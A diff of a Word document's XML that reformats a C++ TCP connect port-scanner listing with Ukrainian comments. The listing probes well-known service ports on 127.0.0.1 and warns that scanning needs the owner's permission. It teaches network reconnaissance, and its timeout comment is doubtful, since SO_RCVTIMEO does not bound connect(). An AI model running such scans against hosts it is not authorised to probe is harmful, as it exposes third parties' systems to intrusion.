-        <w:t xml:space="preserve">// у властивостях додати бібліотеку ws2_32.lib (Linker → Input → Additional Dependencies).</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">// у властивостях додати бібліотеку ws2_32.lib</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">// (Linker → Input → Additional Dependencies).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">#include &lt;iostream&gt;</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">#include &lt;string&gt;</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">#include &lt;vector&gt;</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">#ifdef _WIN32</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">  #include &lt;winsock2.h&gt;</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">  #include &lt;ws2tcpip.h&gt;</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">  #pragma comment(lib, "ws2_32.lib")</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">  using socket_t = SOCKET;</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">  const socket_t INVALID_SOCK = INVALID_SOCKET;</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">#else</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">  #include &lt;sys/socket.h&gt;</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">  #include &lt;arpa/inet.h&gt;</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">  #include &lt;unistd.h&gt;</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">  using socket_t = int;</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">  const socket_t INVALID_SOCK = -1;</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">  #define closesocket close</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">#endif</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">struct ServiceName {</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    int port;</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    const char* name;</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">};</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">const ServiceName KNOWN_SERVICES[] = {</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    {21, "FTP"},   {22, "SSH"},   {23, "Telnet"}, {25, "SMTP"},</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    {53, "DNS"},   {80, "HTTP"},  {110, "POP3"},  {143, "IMAP"},</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    {443, "HTTPS"},{445, "SMB"},  {3306, "MySQL"},{3389, "RDP"},</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    {5432, "PostgreSQL"}, {8080, "HTTP-alt"}</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">};</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">const char* serviceName(int port) {</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    for (const ServiceName&amp; service : KNOWN_SERVICES) {</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">        if (service.port == port) return service.name;</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    }</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    return "Unknown";</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">}</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">// Спроба встановити з'єднання: успіх означає, що порт відкритий</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">bool isPortOpen(const std::string&amp; host, int port, int timeoutMs = 500) {</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    socket_t sock = socket(AF_INET, SOCK_STREAM, 0);</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    if (sock == INVALID_SOCK) return false;</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    // Обмежуємо час очікування, інакше сканування триватиме надто довго</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">#ifdef _WIN32</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    DWORD timeout = static_cast&lt;DWORD&gt;(timeoutMs);</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    setsockopt(sock, SOL_SOCKET, SO_RCVTIMEO, reinterpret_cast&lt;const char*&gt;(&amp;timeout), sizeof(timeout));</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">    setsockopt(sock, SOL_SOCKET, SO_RCVTIMEO,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">               reinterpret_cast&lt;const char*&gt;(&amp;timeout), sizeof(timeout));</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">#else</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    timeval timeout{ timeoutMs / 1000, (timeoutMs % 1000) * 1000 };</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    setsockopt(sock, SOL_SOCKET, SO_RCVTIMEO, &amp;timeout, sizeof(timeout));</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">#endif</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    sockaddr_in address{};</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    address.sin_family = AF_INET;</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    address.sin_port = htons(static_cast&lt;unsigned short&gt;(port));</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    inet_pton(AF_INET, host.c_str(), &amp;address.sin_addr);</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    bool opened = connect(sock, reinterpret_cast&lt;sockaddr*&gt;(&amp;address), sizeof(address)) == 0;</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">    bool opened =</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">        connect(sock, reinterpret_cast&lt;sockaddr*&gt;(&amp;address), sizeof(address)) == 0;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    closesocket(sock);</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    return opened;</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">}</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">int main() {</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    // УВАГА: сканувати дозволено лише власний комп'ютер або вузол,</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    // на який є письмовий дозвіл власника</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    const std::string target = "127.0.0.1";</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
